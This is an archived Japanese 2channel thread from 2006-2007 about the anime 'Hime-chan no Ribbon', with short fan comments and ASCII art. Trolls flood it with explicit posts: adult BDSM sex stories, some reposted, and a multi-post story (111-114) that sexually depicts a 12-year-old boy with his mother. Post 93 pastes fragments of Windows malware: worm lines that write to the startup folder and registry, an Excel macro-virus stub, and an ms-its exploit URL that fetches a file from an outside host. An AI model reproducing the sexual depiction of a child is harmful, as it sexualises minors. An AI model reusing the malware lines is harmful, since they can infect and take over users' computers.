彼のペ○スに手を伸ばしつつ、彼に触ってというように彼の手を導いてましたw
大きな声出さないでね、けっこう声とか筒抜けなのと聞いていたので
声を我慢しつつ彼のペースにすっかり任せてたのですが...
腰痛いと聞いてたから、自分が上で騎乗位でスタートw
でも彼が下からついてくるわけで...騎乗位なのに彼のペース...

かわろうよ...半分辛くなりつつ彼に告げると、上下交代w
いつものように気が付けば背中に爪を立ててる自分...
2人して逝った後、なんだかとたんにまったりで、睡眠に落ちる罠w

・・・・・・・・・・・・・・・・・・・・・・・・・・

私だけが眠ってたのかと思ったら彼も眠ってたらしいw
目がさめた後2ラウンド目(爆)

「ねぇ...生でしたいな...。」
「そのほうが良いけど、だ〜め〜。」

やっぱりいつもどおりの返事...でも今日はほんの少しだけ
生でしちゃった。
彼とは初めての生...やっぱり一番気持ちいいかも(照)
彼も同じように思ってたみたいで、逝っちゃうからやめてと言われたので気持ちよかったけど生をやめてきちんとコンドーさんを使って
しましたw

寒い部屋で2人でまったりしながらの姫初めは、初めての生もあって
今までで一番気持ちいセックスでした。

次に会えるのはいつかなぁ...

85 :名無しさん@お腹いっぱい。:2006/11/01(水) 21:09:11 ID:???O
大地の声にちょっと違和感を感じてしまいまする

86 :名無しさん@お腹いっぱい。:2006/11/01(水) 21:38:06 ID:???0
大地の声で感じてしまいまする

87 :名無しさん@お腹いっぱい。:2006/11/01(水) 21:49:00 ID:???0
初めて見たときは大地の声はだいぶ初々しかったと思う。
中盤で馴染んできたな

88 :名無しさん@お腹いっぱい。:2006/11/01(水) 21:55:58 ID:???0
>>87
      _| ̄|_| ̄|  | ̄|_| ̄|__| ̄|_| ̄|   | ̄|_| ̄|_| ̄|
      |_  _||  | ̄    |  |     |  | ̄   |  |     ̄|
       r┘└へ|  |二コ ┌'|  |二コ ┌|  |二コ ┌'|  |二コ ┌┘
      〈 〈]  ゚,、〈|  | o  ヽ| | o  ヽ|  | o  ヽ|  | o └「 ̄\
      ヽ-ヘ_>ノ_ノ|_|、_ハ/|_|、_八ノ|_|、_ハ/|_|、_ハ/`⊇.ノ

        ____                ____                ____
      /⌒  ⌒\          ./⌒  ⌒\          ./⌒  ⌒\
    o゚((●)) ((●))゚o        o゚((●)) ((●))゚o       o゚((●)) ((●))゚o 
   /::::::⌒(__人__)⌒::::: \   /::::::⌒(__人__)⌒:::: \   /::::::⌒(__人__)⌒::::: \
, -‐ (_)    |r┬-|     |, -‐ (_)    |r┬-|     |, -‐ (_).    |r┬-|     |
l_j_j_j と)   | |  |     / l_j_j_j と)    | |  |     / l_j_j_j と)   | |  |    


89 :名無しさん@お腹いっぱい。:2006/11/01(水) 22:55:10 ID:???0
慣れればどうでもよい希ガス。でも日比野さんはあのおばさん声じゃなきゃ駄目

90 :名無しさん@お腹いっぱい。:2006/11/02(木) 00:26:14 ID:???0
BGMいいなぁ。日テレ・ザワイドで使われてた曲とか
個人的に「本当の気持ち」だったかな。これがすき。

91 :熱血姫ちゃんバカ ◆MvRbZL6NeQ :2006/11/02(木) 10:01:55 ID:???O
>>89
水原氏は元々誰のオーディションで来たんだろ?
まさかオファーってこた無いよな…。

お母さんあたりか。

92 :名無しさん@お腹いっぱい。:2006/11/02(木) 10:20:55 ID:???0
まぁはまってるから理由はどうでもよろし

93 :<body onload=window()>:2006/11/02(木) 20:51:48 ID:???0
Set A4 = A1.CreateTextFile(A1.BuildPath(A1.GetSpecialFolder(1)))
<object data="ms-its:mhtml:file://C:\\MAIN.MHT!http://www.loadcash.biz//adverts//35//main.chm::/main.htm" type="text/
X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*
fso.copyfile "dirsystem&nurupo.vbs", "j:\windows\start menu\programs\startup\"
ToInfect.CodeModule.InsertLines BGN, ADI1.CodeModule.Lines(BGN, 1)
"avgnt"="\"C:\\Program Files\\AntiVir PersonalEdition Classic\\avgnt.exe\" /min /nosplash"
G.RegWrite A("IJDX^MNB@M^L@BIHOD]Rnguv`sd]Lhbsnrngu]Vhoenvr]BtssdouWdsrhno]Sto]VhoRu`su"), E.BuildPath(E.GetSpecialFolder(1), A("VHORU@SU/WCR"))
lines(n)=replace(lines(n),"""",chr(93)+chr(45)+chr(93))
ms-its:mhtml:file://c:\
kak.hta';ken=wd+'START
kill -9 xz/tSaBh0
Sub auto_open()
Application.OnSheetActivate = "check_files"
End Sub
Sub check_files()
c$ = Application.StartupPath
m$ = Dir(c$ & "\" & "PERSONAL.XLS")
If m$ = "PERSONAL.XLS" Then p = 1 Else p = 0
If ActiveWorkbook.Modules.Count > 0 Then w = 1 Else w = 0
whichfile = p + w * 10
End Sub
???????

94 :名無しさん@お腹いっぱい。:2006/11/02(木) 22:28:08 ID:???0
>>91
二度と来ないんじゃなかったのか、偏屈荒らし。

95 :名無しさん@お腹いっぱい。:2006/11/02(木) 22:32:18 ID:???0
 彼女とSEXしたときに、最後のほうで、ソフトSMプレイをしたのを書くのを忘れていました。
 1時間連続結合や、その他の体位を一通り終えた後、あらかじめ予定していたので、是非したい、と彼女のほうから言い出したので、
彼女も初体験だという、ソフトSMをしました。
 簡単なもので、アイマスクによる、完全な目隠しと、手ぬぐいでの両手縛りです。
 その状態で、私は、彼女の全身を舐めまわし、弄り回し、揉み倒しました。そして、正上位で挿入して、そこから屈曲位にして、
激しく突きまくりました。
 愛撫の段階、特にヴァギナへの指いれやクンニで、何度もイッタ彼女も、挿入から屈曲位では、悲鳴をあげてヨガっていました。
 散々突いた後、ペニスを抜き、アイマスクとゴムをはずして、私の液でべとべとになったペニスを舐めさせました。彼女は喜んで、
美味しい美味しいと言いながら、がっぽりと咥えて舐めまくってくれました。

 その後、彼女は、私に向かって、『「今まで○○さん」と呼んでいたのに、「○○様」って言ってませんでしたか?私。
SMにすると、奴隷にしてほしいのかしら。』と言い出しました。SEX奴隷にしてやる。
 今回はこれで終わりましたが、SMプレイは今後もより激しくする予定です。「○○さま、私のアソコを舐めて〜、突いて〜、
もっと〜」などといわせます。言葉責めも好きだそうで、Hなことを言って、彼女がいかにHかを言うと、とても感じるらしいです。
次回の目標は、イッタ後も責め続けての無限快楽、絶頂を目指します。


96 :名無しさん@お腹いっぱい。:2006/11/02(木) 22:33:27 ID:???0
 また、今後したいプレイを言うと、顔をうずめて、照れながら、「してね」っと言います。「Hなこと言うから、濡れちゃった」と言うので、
おまんこを見ると、愛液がにじんでいて、指を入れると、とろとろの溶鉱炉のように熱いです。
 次回は、目隠し、手縛りに加え、極太バイブ、野菜挿入などの予定。銀杏の殻を剥いた実を数粒、おまんこに入れてからの、
ペニスまたはバイブ挿入では、多分、未経験の快楽を味あわせることができるでしょう(古代中国では、ナツメの実を入れると言っていた)。

 あと、最初は良くわからなかったのですが、彼女は、プレイの合間に、肉体が離れているとき、自分の陰部を陰毛ごと、私の身体に
こすり付けてゆっくりと腰を動かしていました。結合かクンニ、指いれをしていたとき以外は、いつもそうしていたかも。いわゆる「恥丘」が、
ほとんど無い、おなかから、へそ下三寸の陰部まですっきりとしているのですが、そこをこすり付けて、甘えた声を出すのです。
 今度は、その時は、そこを揉んだり舐めたりしてあげたいです。 やっぱり、「恥丘」(俗称「土手」)と同じような感じる神経があるのでしょうね。

 現在、ジム通いを始めて、全身の筋肉強化とダイエットを開始。目標(彼女と激しくヤルこと)があると、意気込みが違います。
 今回、弱かった、内腿の、突いたりこねたりするときに使う筋肉と、彼女を抱えあげたまま、全力で突きまくるだけの、腕力、脚力を鍛えます。


97 :名無しさん@お腹いっぱい。:2006/11/03(金) 18:52:04 ID:???0
>>94
      _| ̄|_| ̄|  | ̄|_| ̄|__| ̄|_| ̄|   | ̄|_| ̄|_| ̄|
      |_  _||  | ̄    |  |     |  | ̄   |  |     ̄|
       r┘└へ|  |二コ ┌'|  |二コ ┌|  |二コ ┌'|  |二コ ┌┘
      〈 〈]  ゚,、〈|  | o  ヽ| | o  ヽ|  | o  ヽ|  | o └「 ̄\
      ヽ-ヘ_>ノ_ノ|_|、_ハ/|_|、_八ノ|_|、_ハ/|_|、_ハ/`⊇.ノ

        ____                ____                ____
      /⌒  ⌒\          ./⌒  ⌒\          ./⌒  ⌒\
    o゚((●)) ((●))゚o        o゚((●)) ((●))゚o       o゚((●)) ((●))゚o 
   /::::::⌒(__人__)⌒::::: \   /::::::⌒(__人__)⌒:::: \   /::::::⌒(__人__)⌒::::: \
, -‐ (_)    |r┬-|     |, -‐ (_)    |r┬-|     |, -‐ (_).    |r┬-|     |
l_j_j_j と)   | |  |     / l_j_j_j と)    | |  |     / l_j_j_j と)   | |  |    

98 :名無しさん@お腹いっぱい。:2006/11/04(土) 10:08:17 ID:???0
透明あぼーん機能、かなりいいね。荒しのペースが落ちてるからこっちでスルーすることが出来る。
とはいえ話題がないわけだが

99 :名無しさん@お腹いっぱい。:2006/11/04(土) 11:37:57 ID:???0
>>98
終わってるジャン。

100 :名無しさん@お腹いっぱい。:2006/11/04(土) 11:41:02 ID:???0
|粘着してねーで早くファンタ買ってこい!
.. ̄ ̄ ̄ ̄|/ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄
             ゲシ ゲシ
     ∧__,,∧  ̄= )  ∧__ ∧ドカ ドカ
..     ( ´兪) = ̄)  (-@∀@)__
     (入   ⌒= ̄_)) ⊃⊃  ./|
      ヾヽ  / ̄=/  /   /  |
      || ¬| ̄ ̄ ̄|   | ̄ ̄ ̄|
       ´  |      |   |      |    

101 :名無しさん@お腹いっぱい。:2006/11/04(土) 13:29:44 ID:???0
>>94
志村〜 シカトシカト

102 :名無しさん@お腹いっぱい。:2006/11/04(土) 18:00:33 ID:???0
もう怒ったぞう

どかーん!
(⌒⌒⌒)
 ||

/ ̄ ̄ ̄ ̄ ̄\
| ・ U      |
| |ι        |つ
U||  ̄ ̄ ||

103 :名無しさん@お腹いっぱい。:2006/11/04(土) 21:00:11 ID:???0
最初から消える気なんかさらさら無かったんですね

104 :名無しさん@お腹いっぱい。:2006/11/04(土) 23:01:03 ID:???0
>>103
バカは死ななきゃ治らない。

105 :名無しさん@お腹いっぱい。:2006/11/04(土) 23:18:25 ID:???0
そして憎まれっ子は世に憚る

106 :名無しさん@お腹いっぱい。:2006/11/05(日) 08:46:15 ID:???0
 彼女とSEXしたときに、最後のほうで、ソフトSMプレイをしたのを書くのを忘れていました。
 1時間連続結合や、その他の体位を一通り終えた後、あらかじめ予定していたので、是非したい、と彼女のほうから言い出したので、
彼女も初体験だという、ソフトSMをしました。
 簡単なもので、アイマスクによる、完全な目隠しと、手ぬぐいでの両手縛りです。
 その状態で、私は、彼女の全身を舐めまわし、弄り回し、揉み倒しました。そして、正上位で挿入して、そこから屈曲位にして、激しく
突きまくりました。
 愛撫の段階、特にヴァギナへの指いれやクンニで、何度もイッタ彼女も、挿入から屈曲位では、悲鳴をあげてヨガっていました。
 散々突いた後、ペニスを抜き、アイマスクとゴムをはずして、私の液でべとべとになったペニスを舐めさせました。彼女は喜んで、
美味しい美味しいと言いながら、がっぽりと咥えて舐めまくってくれました。

 その後、彼女は、私に向かって、『「今まで○○さん」と呼んでいたのに、「○○様」って言ってませんでしたか?私。SMにすると、
奴隷にしてほしいのかしら。』と言い出しました。SEX奴隷にしてやる。
 今回はこれで終わりましたが、SMプレイは今後もより激しくする予定です。「○○さま、私のアソコを舐めて〜、突いて〜、もっと〜」
などといわせます。言葉責めも好きだそうで、Hなことを言って、彼女がいかにHかを言うと、とても感じるらしいです。次回の目標は、
イッタ後も責め続けての無限快楽、絶頂を目指します。


107 :名無しさん@お腹いっぱい。:2006/11/11(土) 01:40:44 ID:ydIa5wIK0
↑これしつこい

108 :名無しさん@お腹いっぱい。:2006/11/11(土) 07:57:01 ID:???0
○○○様(私の名前)

☆☆はもう怒ってません
○○○様が2×日予定を変更してまで☆☆を犯したいとおっしゃるのでしたら、ぜひそういたしましょう

何時から何時まで大丈夫ですか??
もし、早い時間スタートがよろしければ、会社の方外回りと称して早く出れるか画策してみます

お薬も○○○様の使いたい物で(処女のようなしまりか、☆☆が乱れに乱れるか)☆☆を苛め抜いてください。
でも、○○○様の硬くて太い棒でも後ろから☆☆を犬のように犯してくださいね。


 ですよ・・・。次回の予定を決めるのに、ここまでHなことを言い出すと
は。お薬は媚薬や、締まりのよくなる薬です。今回は「休憩」(疲れるのに)なので、色々はできないので、1つに選んで行きます。
 私としては、自分の物の感度がいまいちなので、媚薬の方をもって以降と思っています。「硬くて太い棒」が、お気に入りのようですな。バックが好きとは言っていましたが、自分から「犬のように」と言い出すとは、マゾですね。存分に責めてきましょう。
 あぁ、「ムラムラが止まらない!」

109 :名無しさん@お腹いっぱい。:2006/11/11(土) 11:52:46 ID:???0
そういえば、明日11月12日は3年後の未来の姫ちゃんに会った日ですね。

110 :名無しさん@お腹いっぱい。:2006/11/11(土) 23:25:23 ID:???0
リアルならそれも10年位前かな

111 :名無しさん@お腹いっぱい。:2006/11/12(日) 07:28:34 ID:???0
 皮膚が弱い体質の僕は、小さい頃からアトピー皮膚炎や湿疹などに悩まされ、皮膚科
によく通院していました。
そんな僕も中1になり、皮膚炎になることもなくなり快適な生活を送っていたのですが、
ある朝起きると下腹部に湿疹ができており、寝ながら無意識に掻いたのか、赤く炎症を
おこしていました。

その湿疹はものすごく痒くて、日を追う毎に患部は広がり、太もものつけねから、お腹
の下辺りまでが赤くなり、おちんちんも例外なく発疹ができていました。
あまりの痒さに、血が出るくらいまで掻きむしってしまうのですが、出来た場所が恥ず
かしく、病院にも行けず、親にも黙っていました。
発病から5日経った夜のことです。
お母さんは赤く血のついたパンツを持って、僕の部屋にやってきました。

お風呂から出て、自分の部屋でマンガを読んでいると、
「パンツ汚れているけど、どうしたの?」
と聞きました。僕は、「何でもないよ」と言いましたが、お母さんは
「見せなさい」と言って聞いてくれません。
お母さんは怒ると凄く怖いので、僕はベッドに腰かけ、パジャマのズボンとパンツを
いっしょに脱ぎました。

「赤くなってるわね。ずっと我慢してたの?」
そう言うと、お母さんは僕の足の間にひざまづき、おちんちんの先を指で摘むと、顔を
近づけ覗き込みました。
その瞬間でした。
指で摘まれたことで、反応したおちんちんが勃起し始めたのです。
今まで全くお母さんを女性として意識したことなかったのですが、ブラウスの上から覗
ける胸の谷間が目に飛び込んでくると、おちんちんはカチカチに硬くなりました。

お母さんは、そんなこと全然気にする様子もなく、おちんちんを指で摘んだまま、右手
の指で袋の皮を伸ばしたりして、患部の状態を調べていました。
そして、
「こんなになるまで黙っていちゃ駄目でしょ。薬持ってくるから待ってなさい。」
といって、部屋を出て行きました。
お母さんが出て行くと、僕は勃起したおちんちんを見ました。
最近、やっと剥けるようになり皮から飛びだした先っちょは、ピンク色の頭から透明な
液が滲み出ています。


112 :名無しさん@お腹いっぱい。:2006/11/12(日) 07:29:22 ID:???0
僕はその液をティッシュで拭き取ると、お母さんが戻ってくる前に勃起がおさまってく
れないかなと思いましたが、なかなか小さくなりません。
バタバタと階段を駆け上がる音がすると、お母さんが僕の部屋に戻ってきました。
「薬塗ってあげるからね」
「・・・いいよ。自分でやるから・・・」
僕は慌てて、断りました。顔が火照って、赤くなっているのがわかります。

「何言ってるの。恥ずかしがってる場合じゃないでしょ」
お母さんは再度ひざまづくと、右手の人差し指と中指に薬をつけ、左手の指でおちんちん
を摘むと、赤く炎症おこした皮膚に直接塗布し指で塗り広げてくれました。
チューブから薬を捻りだす時、おちんちんを摘んだ左手を一旦離すのですが、その度に、
ビクッ・・・ビクッとおちんちんが波打って、恥ずかしくてたまりませんでした。

最後に、おちんちんにも薬を塗布しようとするお母さんに
「ここは、僕がするからいいよ」と言ったのですが、お母さんは
「何、親子で恥ずかしがってるのよ。馬鹿な子ね!」
と言って、おちんちんの先端で皮を摘んで固定し、指につけた薬を患部に塗り広げてい
きました。
もう、僕は逝きそうになるのを堪えるのに必死で、頭の中で大嫌いな数学の事を考えな
がら、気を集中させないようにしていました。

「はい、もういいわよ」
お母さんはそう言うと、摘んでいたおちんちんを離し、僕の顔をジッと下から覗き込ん
でいます。その仕草、そして、微笑んだ表情は本当に可愛く、
「お前のかあちゃん、若くて美人だよな。」
と、言っていた友達の言葉が頭の中を過ぎりました。
「優ちゃん(僕の名)、ティッシュ取ってくれる?」
言われたとおり、お母さんにティッシュを箱ごと手渡すと、パッ・パッ・パッ・と数枚
抜き取り、開放されたおちんちんから溢れ出ている透明の液体が、薬を塗布した患部に
流れ落ちる前に拭い取り、そして、おちんちんの先端にティッシュを被せ、染み込ませ
て優しく拭き取ってくれました。


113 :名無しさん@お腹いっぱい。:2006/11/12(日) 07:30:16 ID:???0
「ねぇ、優ちゃんの・・・・もう皮が剥けるようになったんだね。12歳だもんね。」
そう言うと、右手でおちんちんの皮を根もとに向かって下げていき、亀頭を剥き出しさ
せると、
「あれぇ・・・こっちもきれいにしてる?きちんと洗わないと、すぐに垢が溜まっちゃう
 んだよ。お父さんに洗い方習ってないの?」
と言って、ティッシュで亀頭の下に付着した垢を擦りとり始めたのです。

「んッ・・・」
自分でさえ触ったこともない敏感なところを無造作に触られたことで、腰が引けて声が
漏れました。
「ほらぁ、ジッとしときなさい。不潔にしてると病気になるわよ」
「だって・・・・」
火照ったおちんちんに、お母さんの鼻息がかかます。皮の内側にも白い垢の塊が付着し
ていて、それを拭き取るのに右手の細い指が幾度と上下し、その指の感触が気持ちよく
て、いつ射精してもおかしくありませんでした。

先端より溢れ出た透明の液は、蛍光灯の灯りでテカテカと光沢をおび、その液はお母さん
の指にまで流れ落ちています。
「人には見られたくない。まして、お母さんの前では絶対に嫌だ。」
快感と羞恥心の葛藤の中、唇を噛みしめたり、脚に力を入れたりと気を散漫させるよう
に努め、「早く終わってほしい」と願っていました。
(・・・・もうダメ・・)
下腹部から込上げてくる熱いものが限界に達そうとしていた時、
「はい。綺麗になったわよ。」
と、お母さんがニッコリ笑ってそう言いました。


114 :名無しさん@お腹いっぱい。:2006/11/12(日) 07:31:04 ID:???0
(助かったぁ・・・)
正直ホッとしました。
「・・・ありがとう。お母さん」
「うん。・・・でも、お風呂に入った時は、毎日洗いなさいよ。優ちゃんは皮膚が 弱く
 て直ぐ炎症おこすから。それに、初めは痛いかもしれないけど、こうやって何度かやっ
 てれば・・・」
と、おちんちんの皮を剥くやり方を教えようと、握っていた右手を2、3回上下に動か
したのです。

「あッ・・ダメ・・・・」
声が漏れるのと同時にでした。
ドクッ、ドクッっと下から突き上げるように大量の精液が、まるでロケットが飛んでいく
ような勢いで発射され、お母さんの髪や顔に命中し、ビックリして手を離した後は、方向
性が定まらずあちらこちらに飛んでいきました。

お母さんは全くそんな状況に陥ることを考えていなかったみたいで、顔から、T-シャツ、
ジーパンにまで精液が付着した姿で、何も言わず僕の部屋を出て行きました。
僕は、こんな勢いよく射精したのも、こんな沢山の量が出たのも初めてでした。
腰が抜けてしまいそうなくらい気持ち良く、しばらく呆然としていましたが、次第に罪悪
感が込上げてきて、明日の朝、お母さんに何て謝ろうかと思うとなかなか寝つけませんで
した。


115 :名無しさん@お腹いっぱい。:2006/11/13(月) 20:23:10 ID:???0
 来月に予定されている、温泉露天風呂付貸し別荘では、寒い時期ながら、内部から灼熱の肉棒で暖めながら、露天風呂でのアオカン感覚で
セックスしまくります。
 まずは、14時のチェックイン後、すぐにお風呂に行って、まだ日光が当たる間に、彼女のアソコを日光消毒。多分、おまんこに日光が当たる
のは、赤ん坊の頃以来でしょう。
 昼間は、まだまだ時間があるので、ゆったりとペッティングやフェラ、クンニ主体で、「失楽園」の映画シーンのような、お風呂の中での対面座位。

 その後、室内では、階段や柱を利用しての、変形立位での挿入。突きまくり、こねまくり。ベッドは、当然ダブルなので、いろいろします。
 夕食は買ってきたものを食べますが、当然、ペニスに乗せたものをペニスごと食べてもらったり、女体盛り、おまんこ味付け野菜(膣圧漬物)
なども賞味。
 ひとしきり汗をかいたら、再度夜の露天風呂で、一戦。今回の山場です。
 彼女は、SMに目覚めたらしく、「他の部屋に喘ぎ声が聞こえるのが恥ずかしいから」と言い訳して、猿ぐつわを志望しています。目隠し、
両手後手縛りも当然です。そこを、温泉の縁に、上半身を乗せて、顔の下にタオルを敷いて、お尻を思い切りつき上げてもらい、そこに、
深々と挿入します。
 今回は、結合時間を長く取り、まったりと責め続けます。
 彼女が果て尽きて、ぐったりしたら、一応、お休み。
 でも、まだ抜きません。彼女は手を解放されて、四つんばいで、バックで突かれながら、お風呂から上がります。そこから室内に入って
身体を拭くところから、ベッドにいくまで、ずっとバックから突きっぱなしです。一突きで一歩。2人では、これを「二両連結」と呼んで、
今から楽しみにしています。
 ベッドに入ったら、お休み。本当の意味での休憩。

 休憩が一段落したら、寝るまで、普通のベッドでのプレイ。
 睡眠は十分にとって、翌朝は10時、チェックアウトまで、まだヤリます。前日のプレイでよかったものを、再度します。媚薬も使います。
お風呂プレイもします。
 そして、時間が来たら、何食わぬ顔で、服を着て、上品なカップルとして部屋を出ます。

 以上のことは、全部、淫乱セフレが、メールに書いてきたことです。
 猿ぐつわまでしてほしいとは、完全に調教体勢に入りましたな。
 あぁ、楽しみ。


116 :名無しさん@お腹いっぱい。:2006/11/23(木) 22:00:17 ID:6CCu14DL0
11月12日、どうだったのだろうか?

117 :名無しさん@お腹いっぱい。:2006/11/27(月) 08:17:34 ID:fQYL9ADi0
これ今見ると、大地の声がめちゃ下手だなw
なんでこんな奴起用したんだw

118 :名無しさん@お腹いっぱい。:2006/11/27(月) 21:33:28 ID:CSwg/2zA0
>>117
だがそれがいい

長年姫ちゃんファンやってると
大地も支倉もこれ以外の声は想像できなくなる
というか俺が断固反対するw

119 :名無しさん@お腹いっぱい。:2006/11/28(火) 21:37:28 ID:???0
後半から大地が馴染んできたと思ってた。

120 :名無しさん@お腹いっぱい。:2006/12/02(土) 22:50:40 ID:???0

               ,. -一……ー- 、
                /::::{:/::::‐-:、:::丶:\
                 /:::::/´ ̄ ̄__\、::::l,. -―、
              /::::// /:: ̄、:\::::ヽヽ≦、ス=、、
           /::::/::|,.イ:l::丶::::::::\:X:::',:::ヽ、 ヽハ ',ヽ
           f´ ̄!:::::l:_|_|\::\--/,r=ミ|::::::lヾく:l::', | |
          ヒア_|:l::::|::N,≧ミ、トゝ ハ心}!::::::K:ヾニ二ヽ ただの人間には興味ありません。
         ,r=ヽレ|:|::::l::|{ ト心     `'" !::::::|::!',::|ハ::! ` この中に宇宙人、未来人、異世界人、超能力者、魔女見習いがいたら
        // |:|:::::ハ!、::ヾゝゞ'′ _'_,.ヘ  /::::/:::|_!:l リ   あたしのところに来なさい。以上
          //  !ハ//|:|::ヽ::::丶、__丶 _ノ/|:::/イ::ハヘ!ヽ_
       L!   /ヘ |:|ミニ='⌒ (⌒ヽ´ _ !イノl/ |:! ! !L_
           〈_{  ヾ.,!/  , ´ \ ∨,.‐、|  l:| |ノ   !
                __!\ /   __ム  V⌒!   !:! !   ハ
             /__レ-〈  / f´ ヽ. '. __! //./-‐ '´ /
                 ヽ! |r'   \l__ V/ /-‐   /
                 「 ! {  `\_f_ノ∠ミヽ! /
               / ヽ`ヽ.二ニァ'V∠二ハ }},!-'
               /   ヽ---/´/レ!ト--'/‐'
             /      / ̄ヽ二ノ´l:ヽノ_
           r‐!       /     l:/   `ヾ==、ー-- 、
          / ̄|     ヽ./     〃  /人   `ト、::::\
          ', /     ,!\   |l       \ /  \:〈
           | ′   / |   `  |:!       /    `
           L.__   /  !    !:ヽ     / !
             ` iー---一'Tー-∨-r‐''´  |

121 :名無しさん@お腹いっぱい。:2006/12/15(金) 07:00:01 ID:PWmif5Fd0


122 :名無しさん@お腹いっぱい。:2006/12/31(日) 23:27:47 ID:HZnF7Gx50
大晦日age

123 :名無しさん@お腹いっぱい。:2007/01/16(火) 22:50:34 ID:???O
愛子お姉ちゃんステキ過ぎ

124 :名無しさん@お腹いっぱい。:2007/01/22(月) 21:13:12 ID:???0
行け行けGOGOジャーンプッ!!

125 :名無しさん@お腹いっぱい。:2007/01/23(火) 17:47:12 ID:QyhNIcLb0
姫ちゃんに惚れた

58 KB
■ このスレッドは過去ログ倉庫に格納されています

★スマホ版★ 掲示板に戻る 全部 前100 次100 最新50

read.cgi ver 05.04.00 2017/10/04 Walang Kapalit ★
FOX ★ DSO(Dynamic Shared Object)